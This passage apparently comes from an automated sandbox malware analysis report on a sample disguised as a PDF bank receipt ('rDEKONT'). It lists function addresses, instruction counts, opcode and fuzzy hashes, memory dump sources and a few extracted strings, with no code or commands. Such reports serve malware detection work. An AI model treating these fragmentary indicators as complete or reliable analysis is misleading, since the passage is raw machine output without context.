                                                                                                                                                          • Instruction ID: db01da40fc1193c8bf2578b2c3a4b875f6dd668cbefa0950064d5502289fed8a
                                                                                                                                                          • Opcode Fuzzy Hash: 829ff1b64cde8a64af6e1615cdf32578da0a2409a72db069aeaa3a7788d2fbe2
                                                                                                                                                          • Instruction Fuzzy Hash: 2CF01574E15249AFC780DFA9D45468CBBB0EF09310F0480EAE854E7362E6349A40CF92
                                                                                                                                                          Function 056FB2B0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: df4866fa146dbe4068be8fc748bfe74007773fe82c9aab630a0efa4bf64ef99c
                                                                                                                                                          • Instruction ID: 9176e6ec11249fc0109a5c3d93ffc1814538309209637526ab40e62c3b1bfdad
                                                                                                                                                          • Opcode Fuzzy Hash: df4866fa146dbe4068be8fc748bfe74007773fe82c9aab630a0efa4bf64ef99c
                                                                                                                                                          • Instruction Fuzzy Hash: 4DE08632B447415BE602A619EC4198AFBD2EFE12A07048A3BD1468B768DA61AC4987D1
                                                                                                                                                          Function 0B842958 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f3cac97f16a2cceba1723289580f2702eeacb0b0e31489321e407140c5ffd4f7
                                                                                                                                                          • Instruction ID: ef0f6b2f957f1de93048f765a64b0211f757c003acc2e8d2164a19f775046f6e
                                                                                                                                                          • Opcode Fuzzy Hash: f3cac97f16a2cceba1723289580f2702eeacb0b0e31489321e407140c5ffd4f7
                                                                                                                                                          • Instruction Fuzzy Hash: A3E01239501314DFCB109F64E8449947771FF49366B1112E5E926973A2CB329E42DF51
                                                                                                                                                          Function 0B84E048 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fe40c78eb5b5a6eb5e86f229e32f749d15d1ad268ecedc0017aaa437b6f64ac0
                                                                                                                                                          • Instruction ID: 767658119c122963984dda98c03096fe081dc09088f0e8699ba2ca74fc65a901
                                                                                                                                                          • Opcode Fuzzy Hash: fe40c78eb5b5a6eb5e86f229e32f749d15d1ad268ecedc0017aaa437b6f64ac0
                                                                                                                                                          • Instruction Fuzzy Hash: E6E046B0A0A389EFC307DBB89901248BF76EB03205B1904DAD0449B2A2CB384988DB91
                                                                                                                                                          Function 0B845F21 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b41c4cc7f048051549139abfc66c35b6a6bee40ebb4b7892269dcdf32759eff6
                                                                                                                                                          • Instruction ID: 582b52499e20afc0f8aab8c50ce8ee4cce572a9d36402ebe9a15bc746c2e7c8e
                                                                                                                                                          • Opcode Fuzzy Hash: b41c4cc7f048051549139abfc66c35b6a6bee40ebb4b7892269dcdf32759eff6
                                                                                                                                                          • Instruction Fuzzy Hash: 6EE0463091938ACFCB0ADBB8A8562DD7FF19B46210F2001EAD408E76B0E6750E05DB62
                                                                                                                                                          Function 0B84A3F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0b030890dbc820631d614848fef5570a76de8ed998fe84e4d147877fd001a916
                                                                                                                                                          • Instruction ID: 08ff9be5f12e107702e74bad84af787713c0fcb2dd6c8c70c3b35aca8991866d
                                                                                                                                                          • Opcode Fuzzy Hash: 0b030890dbc820631d614848fef5570a76de8ed998fe84e4d147877fd001a916
                                                                                                                                                          • Instruction Fuzzy Hash: 9CE0EDB0D0021DDFCB44DFA8D9456ADBBB5FB04310F1085B9D814A7310D7715651DF90
                                                                                                                                                          Function 056FCB34 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1f73ba30807541bedc3486e0a0f90829a335804a7a6a4312091704171f05f7a1
                                                                                                                                                          • Instruction ID: 6c96c25901c92efd2ea180c49c164bf4a6fd251c76acf4cfa0c90930f5933bbc
                                                                                                                                                          • Opcode Fuzzy Hash: 1f73ba30807541bedc3486e0a0f90829a335804a7a6a4312091704171f05f7a1
                                                                                                                                                          • Instruction Fuzzy Hash: 5EF09278E142099FEB04DF94D990EADBBB1BF88700F108659E915AB360CA70AD44CFA4
                                                                                                                                                          Function 0B848850 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1bd89521040c07340a5f4d430e264b680256216a9d02a87797d5ff5cb705b00c
                                                                                                                                                          • Instruction ID: c5c85a6983556a096d3e457431b5be457b3db67e9d89138efa824e69690ab35a
                                                                                                                                                          • Opcode Fuzzy Hash: 1bd89521040c07340a5f4d430e264b680256216a9d02a87797d5ff5cb705b00c
                                                                                                                                                          • Instruction Fuzzy Hash: EFE09274E10209EFCB80DFA9D449A9CBBF4EB08710F0080EAE818E7361E734AA40CF41
                                                                                                                                                          Function 0B842940 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ccd232cc391fa5458a206770233ac083ef424cc4e4d1b88092e59885123a4a1c
                                                                                                                                                          • Instruction ID: 343fb46a4242bc096c96f669eb58d31f52e3522b5f6261ccb2a027cc69d41a78
                                                                                                                                                          • Opcode Fuzzy Hash: ccd232cc391fa5458a206770233ac083ef424cc4e4d1b88092e59885123a4a1c
                                                                                                                                                          • Instruction Fuzzy Hash: 91E0EC36601248DFC715DF64E5448947B72FB85316B5010A5E50587221C7329A51CF50
                                                                                                                                                          Function 0B84C848 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6e7c3f39b37baa1b732075c3b7101277b68bbe7035b617de90ea857e0e40101b
                                                                                                                                                          • Instruction ID: bd372e55e41ebce7e33727f61f6276ae01bc95e83b3d9f98ba55d7ce5b8e20d4
                                                                                                                                                          • Opcode Fuzzy Hash: 6e7c3f39b37baa1b732075c3b7101277b68bbe7035b617de90ea857e0e40101b
                                                                                                                                                          • Instruction Fuzzy Hash: 70E08C7480920DDFCB45CFA1C0498BA7FBAEF89305F1090A4E56AAB222CB31C442CF51
                                                                                                                                                          Function 0B848620 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 012c0cb9c34f3c4d1d358b618d0f6e014b0f61e22c0f503c0ca59db0eab9171b
                                                                                                                                                          • Instruction ID: 6bf2f6ab06190cc35c59bfedd8c49dd064912806da44120f491f3e68781a06d9
                                                                                                                                                          • Opcode Fuzzy Hash: 012c0cb9c34f3c4d1d358b618d0f6e014b0f61e22c0f503c0ca59db0eab9171b
                                                                                                                                                          • Instruction Fuzzy Hash: B2E0E2B0E0020EAFCB80EFA9D44569CBBF4AB08300F0080AA9818E3350EB385A54DF81
                                                                                                                                                          Function 056FB028 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 16dd48c7484da874b1b1753fb7634a330cb7f6616a4167f68039d10a4ae824f6
                                                                                                                                                          • Instruction ID: 65bf22de851fa340f90d443610f12ec12533b866344eb2b087ccc90e41124242
                                                                                                                                                          • Opcode Fuzzy Hash: 16dd48c7484da874b1b1753fb7634a330cb7f6616a4167f68039d10a4ae824f6
                                                                                                                                                          • Instruction Fuzzy Hash: 09E01235209285AFC7429BA588989547F35AF0B724B15D186F6888E193C3324566DB11
                                                                                                                                                          Function 0B845F30 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 50d9df1bd31ca29fca1c0432cd7aa7f00cb6c21b7d667ed7d379317241af8da3
                                                                                                                                                          • Instruction ID: 48582f82aa162ae37ef228720aec848591a5fbf5ec79b80429dcffc3185626e4
                                                                                                                                                          • Opcode Fuzzy Hash: 50d9df1bd31ca29fca1c0432cd7aa7f00cb6c21b7d667ed7d379317241af8da3
                                                                                                                                                          • Instruction Fuzzy Hash: 57D0A970A0120EDBCB40EBB8E90669DBBB89B00200F1041F89808A3260FB301F00DB92
                                                                                                                                                          Function 0B84E058 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 88393e5d119cb97b445980ca0cd788536ef14f6c83aac8334e92f46cfb57148d
                                                                                                                                                          • Instruction ID: 85bd31f3551d5cf178bd9c320151881475c34836e6f944e9305e642f2e58db4b
                                                                                                                                                          • Opcode Fuzzy Hash: 88393e5d119cb97b445980ca0cd788536ef14f6c83aac8334e92f46cfb57148d
                                                                                                                                                          • Instruction Fuzzy Hash: 7CD0C9B090620CEFC758EAA994056597769EB02215F1440A8940453260DB765A44DB92
                                                                                                                                                          Function 0B84A430 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f160e7a428e386061b463203445df7a8e40371780ba43ef22b718668a9d50d6e
                                                                                                                                                          • Instruction ID: c6cccf0490d9dc9bd41d1e7e9c5d882f02c9e22781f487f3846fe773134561bd
                                                                                                                                                          • Opcode Fuzzy Hash: f160e7a428e386061b463203445df7a8e40371780ba43ef22b718668a9d50d6e
                                                                                                                                                          • Instruction Fuzzy Hash: 79D0A7301492C09FC316ABECF51D2083F709B07316B060096F145CF0B2C7748481DF22
                                                                                                                                                          Function 056FDF90 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 81ce5ac34926fa97c7fb5069e973a876abd4e0dcaaa1392278af8c7ec944a619
                                                                                                                                                          • Instruction ID: 1477c96f1446054a49e69716fa125a51f9b0c53bb60599027fb46041b5bc1921
                                                                                                                                                          • Opcode Fuzzy Hash: 81ce5ac34926fa97c7fb5069e973a876abd4e0dcaaa1392278af8c7ec944a619
                                                                                                                                                          • Instruction Fuzzy Hash: A9D02331E0956147C311070C7404449BFF4DDCE36131541FFED08C3241EB150811C7D5
                                                                                                                                                          Function 056FDCC0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 14e5a51cd1567d284398726b15259cb9b429cb39ddea8b2b00bf148f1a3d3791
                                                                                                                                                          • Instruction ID: a6ccd20f242801812bbfd0baf564aa8f700f65f6984e1f496e075d8418494ea7
                                                                                                                                                          • Opcode Fuzzy Hash: 14e5a51cd1567d284398726b15259cb9b429cb39ddea8b2b00bf148f1a3d3791
                                                                                                                                                          • Instruction Fuzzy Hash: 7AE042B5E4010ACFD700DF64D59AAADBBB1BB08718F208459D516AB261CB746844DF50
                                                                                                                                                          Function 0B84C1D6 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bebd6cbdb22416a8f94fd3b21d9233c6a7ddbb1dbf8117263184a95e2fd4bf0
                                                                                                                                                          • Instruction ID: ef8ea3c7c547320ddd7f248552230d5626b8b90645a3eb648381f53afda0fc8b
                                                                                                                                                          • Opcode Fuzzy Hash: 4bebd6cbdb22416a8f94fd3b21d9233c6a7ddbb1dbf8117263184a95e2fd4bf0
                                                                                                                                                          • Instruction Fuzzy Hash: D7D092345042A8CFD714DF25D998BAA7776FF8A706F415499E01BAB2A1CB709C81CF12
                                                                                                                                                          Function 056FB038 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8f1cde15990fcb145ae6cf1de37c2e2944375e3f09939e29e24039c76f16ec18
                                                                                                                                                          • Instruction ID: f8ef038cf4c8b6cb59bc026d60e544bed7794572623f6b78c0bf3a144e90ab07
                                                                                                                                                          • Opcode Fuzzy Hash: 8f1cde15990fcb145ae6cf1de37c2e2944375e3f09939e29e24039c76f16ec18
                                                                                                                                                          • Instruction Fuzzy Hash: 11C01236200208AFDA80AA94C880D667769AB08B14F50D044FA080A201C272EA62DBA0
                                                                                                                                                          Function 0B84A440 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 682fd86c56d7e76fbbe1f310ba332739b3f39d16b42b7d6e4c6184a324dc769f
                                                                                                                                                          • Instruction ID: 31dc6e1a0d6c7abcf4c128b4294755b95c0ca96ca083d0a4920a1ba137a6b063
                                                                                                                                                          • Opcode Fuzzy Hash: 682fd86c56d7e76fbbe1f310ba332739b3f39d16b42b7d6e4c6184a324dc769f
                                                                                                                                                          • Instruction Fuzzy Hash: BAC08C700462488FC70437E8B40C32876A89702316F004010F608820A08B708081DA63
                                                                                                                                                          Function 056FBD20 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d0bb8d1f9e6135626548bae8b98b01f081158cb172be279e8e88cea9a744b89e
                                                                                                                                                          • Instruction ID: 08d21772048be911b1d01060a085278de0f26ee4469a99ef3e2b1a64950bafaa
                                                                                                                                                          • Opcode Fuzzy Hash: d0bb8d1f9e6135626548bae8b98b01f081158cb172be279e8e88cea9a744b89e
                                                                                                                                                          • Instruction Fuzzy Hash: 95C0927841E2814FCB224B92C9A91107F74BE032603AA10C2DE94C7277EB248A34CBA3
                                                                                                                                                          Function 056FBEC0 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 33c33f437f6ff42c66b50efef8cd656edb88065ddd5206f3e401c3b34039b186
                                                                                                                                                          • Instruction ID: 83f88a9c0de995bd08e17036bb75c5598bbcdee2e1eec464696f8ddbd6a1d0ea
                                                                                                                                                          • Opcode Fuzzy Hash: 33c33f437f6ff42c66b50efef8cd656edb88065ddd5206f3e401c3b34039b186
                                                                                                                                                          • Instruction Fuzzy Hash: E1D0A710D5D2C48FC311972CB8244D8BF54BB42044B4401EBE8404E063CA1950068746
                                                                                                                                                          Function 056F9AF8 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728282502.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_56f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f0334ab18601346762c2c6cfff7ec6e5405b791261e648d427a70e640dff28b0
                                                                                                                                                          • Instruction ID: 62e1f08980063e05e35b191cbb5759329aa88081bc433a82f7db767ad2c29a66
                                                                                                                                                          • Opcode Fuzzy Hash: f0334ab18601346762c2c6cfff7ec6e5405b791261e648d427a70e640dff28b0
                                                                                                                                                          • Instruction Fuzzy Hash: 4BC02B5028D10151C000E318084072EDE40DFD2300F40CC0D670D46205C030CC07D726
                                                                                                                                                          Function 0B84AADC Relevance: .0, Instructions: 8COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 94bc928b577381f9c9c4b6c4bb1cce37a591b0cb467a2e4708e85982d1a7fb30
                                                                                                                                                          • Instruction ID: 87cdfa63115820da7bb6078b378d049714a583dac0deefa992011fff7a728e12
                                                                                                                                                          • Opcode Fuzzy Hash: 94bc928b577381f9c9c4b6c4bb1cce37a591b0cb467a2e4708e85982d1a7fb30
                                                                                                                                                          • Instruction Fuzzy Hash: 6EC0023094A25DCFCB95DB14D994BE8BBBAEB49358F0055E4D01D96235DB305EC9CF02
                                                                                                                                                          Function 0B845274 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ca2fe8ff074938d0eeb83fc0f04d356ffa8561da34ce476ff3497d837ecde271
                                                                                                                                                          • Instruction ID: 867be4c591c253bfeaca890e998cb67c033937a0014585971fe788d2fbb3387f
                                                                                                                                                          • Opcode Fuzzy Hash: ca2fe8ff074938d0eeb83fc0f04d356ffa8561da34ce476ff3497d837ecde271
                                                                                                                                                          • Instruction Fuzzy Hash: 3DB0123D19850DEB88442BAC49C293EE810EBB5F48B50CC127315C60748B20C8A4E15F
                                                                                                                                                          Function 0B8474D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5129e8564417f5ce796d79e0e5c71302123d702d81535460af098663c9b62257
                                                                                                                                                          • Instruction ID: d8ba2aa61c304de61620a66152da6bb666a4c2b789f4eccf79a852d037395941
                                                                                                                                                          • Opcode Fuzzy Hash: 5129e8564417f5ce796d79e0e5c71302123d702d81535460af098663c9b62257
                                                                                                                                                          • Instruction Fuzzy Hash: 1DC092C6A69AD28FE7029274485B4497B108E3760836E04E7A944DE0A2D8C89866D3A7

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0B846910 Relevance: 6.5, Strings: 5, Instructions: 284COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: H4ux$H4ux$H4ux$nay$nay
                                                                                                                                                          • API String ID: 0-1200253175
                                                                                                                                                          • Opcode ID: 9127e2f384a48b6f98b9ae44ff29c236f73003b4795ac8f2e021d8fad0bc216c
                                                                                                                                                          • Instruction ID: 531e4af383ed2855f339443e2c6c6a074d4223d7cced56cd92fc38c326b71024
                                                                                                                                                          • Opcode Fuzzy Hash: 9127e2f384a48b6f98b9ae44ff29c236f73003b4795ac8f2e021d8fad0bc216c
                                                                                                                                                          • Instruction Fuzzy Hash: 37D12CB4E15219CFDB14CFA9D980A9EFBB2FF89304F1091A9D419AB365E7309941CF50
                                                                                                                                                          Function 0B843968 Relevance: 5.2, Strings: 4, Instructions: 174COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
